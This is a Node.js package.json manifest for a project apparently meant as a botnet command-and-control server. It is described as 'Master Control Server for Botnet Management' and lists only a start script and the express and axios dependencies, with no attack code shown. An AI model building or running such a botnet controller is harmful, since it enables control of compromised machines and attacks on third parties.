{
  "name": "master-control-server",
  "version": "1.0.0",
  "description": "Master Control Server for Botnet Management",
  "main": "server.js",
  "scripts": {
    "start": "node server.js"
  },
  "dependencies": {
    "express": "^4.18.2",
    "axios": "^1.6.0"
  },
  "engines": {
    "node": ">=18.0.0"
  }
}
